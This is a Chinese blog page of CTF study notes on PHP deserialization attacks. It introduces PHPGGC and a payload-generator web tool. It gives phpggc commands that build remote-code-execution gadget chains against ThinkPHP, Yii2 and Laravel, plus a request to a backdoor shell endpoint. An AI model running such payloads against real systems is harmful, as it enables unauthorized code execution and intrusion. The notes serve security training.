当前位置: 首页 > ai >正文

PHP 反序列化CLI 框架类PHPGGC 生成器TPYiiLaravel 等利用

# 反序列化链项目 -PHPGGC&NotSoSecure
-NotSoSecure
https://github.com/NotSoSecure/SerializedPayloadGenerator
为了利用反序列化漏洞,需要设置不同的工具,如 YSoSerial(Java)
YSoSerial.NET PHPGGC 和它的先决条件。 DeserializationHelper 是包含对
YSoSerial(Java) YSoSerial.Net PHPGGC 和其他工具的支持的 Web 界面。使
Web 界面,您可以为各种框架生成反序列化 payload.
Java – YSoSerial
NET – YSoSerial.NET
PHP – PHPGGC
Python - 原生
-PHPGGC
https://github.com/ambionics/phpggc
PHPGGC 是一个包含 unserialize() 有效载荷的库以及一个从命令行或以编程方式生成
它们的工具。当在您没有代码的网站上遇到反序列化时,或者只是在尝试构建漏洞时,此
工具允许您生成有效负载,而无需执行查找小工具并将它们组合的繁琐步骤。 它可以看
作是 frohoff ysoserial 的等价物,但是对于 PHP 。 目前该工具支持的小工具链
包括: CodeIgniter4 Doctrine Drupal7 Guzzle Laravel Magento
Monolog Phalcon Podio ThinkPHP Slim SwiftMailer Symfony
Wordpress Yii ZendFramework 等。
# 反序列化框架利用 -ThinkPHP&Yii&Laravel
[ 安洵杯 2019]iamthinking Thinkphp V6.0.X 反序列化
./phpggc ThinkPHP/RCE4 system 'cat /flag' --url
CTFSHOW 反序列化 267 Yii2 反序列化
弱口令登录 / 源码提示泄漏
GET index.php?r=site%2Fabout&view-source
GET /index.php?r=backdoor/shell&code=
./phpggc Yii2/RCE1 exec 'cp /fla* tt.txt' --base64
CTFSHOW 反序列化 271 Laravel 反序列化
./phpggc Laravel/RCE2 system "id" --url
#Thinkphp 反序列化链分析
Thinkphp-All-vuln-main
http://www.xdnf.cn/news/1413.html

相关文章:

  • 深入微服务核心:从架构设计到规模化
  • Openharmony 和 HarmonyOS 区别?
  • RecyclerView中实现横向左滑加载更多功能
  • 【鸿蒙HarmonyOS】深入理解router与Navigation
  • MOS管驱动电路以及阻值选取
  • ⭐Unity 开发 | 如何通过 NTP 网络时间实现精准的跨平台时间同步【附完整源码 + UI 模块 + 偏差分析】
  • UE5的 Modify Curve 蓝图节点
  • L1-107 高温补贴 - java
  • HBuilder压缩文件教程
  • 滑动窗口算法(一)
  • Python类和对象二(十一)
  • 深度学习中的黑暗角落:梯度消失与梯度爆炸问题解析
  • 制作一款打飞机游戏19:碰撞检测
  • 【双指针】有效三角形的个数
  • 香港科技大学广州|金融科技学域博士招生宣讲会—南开大学专场
  • 大模型面经 | 春招、秋招算法面试常考八股文附答案(五)
  • MCP介绍及Cursor中的应用 -》智能体
  • 【云服务器】在优云智算平台上安装 libnvidia-gl 的实验日志
  • Maven 手动添加 JAR 包到本地仓库笔记
  • 树莓派超全系列教程文档--(41)树莓派config.txt旧版内存控制选项
  • 单片机与FPGA的核心差异、优缺点、编程差异、典型应用场景、选型等对比分析
  • 集结号海螺捕鱼活动系统开发全解(第五篇)
  • Ubuntu20.04下GraspNet复现流程中的问题
  • 26.OpenCV形态学操作
  • tomcat Server 连接服务器 进展
  • LangChain Runnable简介
  • P1613 跑路
  • Eliciting Causal Abilities in Large Language Models for Reasoning Tasks
  • 【Python 学习笔记】 pip指令使用
  • NLP高频面试题(五十二)——BERT 变体详解